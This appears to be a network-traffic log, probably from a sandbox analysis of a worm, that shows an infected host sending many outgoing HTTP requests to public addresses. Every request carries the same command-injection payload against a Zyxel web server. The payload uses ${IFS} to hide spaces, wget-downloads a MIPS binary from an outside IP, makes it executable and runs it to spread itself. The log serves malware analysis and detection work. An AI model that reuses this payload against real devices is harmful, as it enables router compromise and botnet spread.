                                                Jan 29, 2024 07:08:02.638681889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8027192.168.2.234268813.237.66.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638715029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8028192.168.2.234018073.242.148.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638772964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8029192.168.2.2336492208.157.133.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638827085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8030192.168.2.2346560202.63.11.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638854980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8031192.168.2.2338546186.184.54.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638920069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8032192.168.2.234570024.189.9.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638936043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8033192.168.2.2357876135.255.139.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638978004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8034192.168.2.2338646150.187.61.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639022112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8035192.168.2.2339104187.163.22.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639075994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8036192.168.2.2354540220.22.213.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639123917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8037192.168.2.235779814.72.144.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639141083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8038192.168.2.2346004163.166.67.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639178991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8039192.168.2.234148014.129.125.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639211893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8040192.168.2.234010642.174.194.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639256954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8041192.168.2.2338002102.62.169.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639295101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8042192.168.2.2349784204.101.31.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639332056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8043192.168.2.235683232.18.4.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639349937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8044192.168.2.2346700193.192.158.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639410973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8045192.168.2.234686897.57.40.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639481068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8046192.168.2.2335452142.14.30.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639520884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8047192.168.2.235448676.176.177.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639554977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8048192.168.2.23397422.200.249.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639592886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8049192.168.2.234497227.225.44.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639642000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8050192.168.2.2359698187.97.254.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639678955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8051192.168.2.2359614120.185.31.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639705896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8052192.168.2.2333652169.140.97.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639791965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8053192.168.2.235993265.137.101.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639820099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8054192.168.2.2345488198.47.202.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639853954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8055192.168.2.2353892197.84.1.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639914036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8056192.168.2.233810223.94.6.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639935970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8057192.168.2.2333378121.171.31.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.639955997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8058192.168.2.2351390212.53.182.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640012980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8059192.168.2.2341136185.66.219.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640052080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8060192.168.2.2355136158.51.27.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640101910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8061192.168.2.233914838.139.213.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640153885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8062192.168.2.2342840151.153.7.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640182972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8063192.168.2.2340630203.23.159.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640234947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8064192.168.2.236098057.46.227.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640265942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8065192.168.2.2354526171.205.210.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640304089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8066192.168.2.2333716117.212.5.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640347004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8067192.168.2.2335292145.76.237.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640398026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8068192.168.2.2356400223.166.79.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640446901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8069192.168.2.2358054125.194.140.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640506983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8070192.168.2.2341558221.60.117.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640533924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8071192.168.2.2349238118.5.20.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640584946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8072192.168.2.235067620.62.188.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640625954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8073192.168.2.23480784.179.122.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640686035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8074192.168.2.2358810149.149.215.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640729904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8075192.168.2.234107665.187.149.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640788078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8076192.168.2.235024065.156.37.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640820026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8077192.168.2.2343874139.154.24.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640880108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8078192.168.2.235027459.123.50.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640912056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8079192.168.2.2346592107.16.56.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640938044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8080192.168.2.2340564100.157.189.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.640999079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8081192.168.2.2341124209.253.26.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641027927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8082192.168.2.2333176128.238.208.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641068935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8083192.168.2.233677665.197.56.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641093969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8084192.168.2.2336080220.104.171.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641132116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8085192.168.2.2358102200.93.62.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641182899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8086192.168.2.235869454.219.151.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641206980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8087192.168.2.2360294181.177.68.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641263008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8088192.168.2.233583431.40.131.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641304970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8089192.168.2.2341336196.164.202.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641339064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8090192.168.2.234347836.113.212.56443
                                                TimestampBytes transferredDirectionData
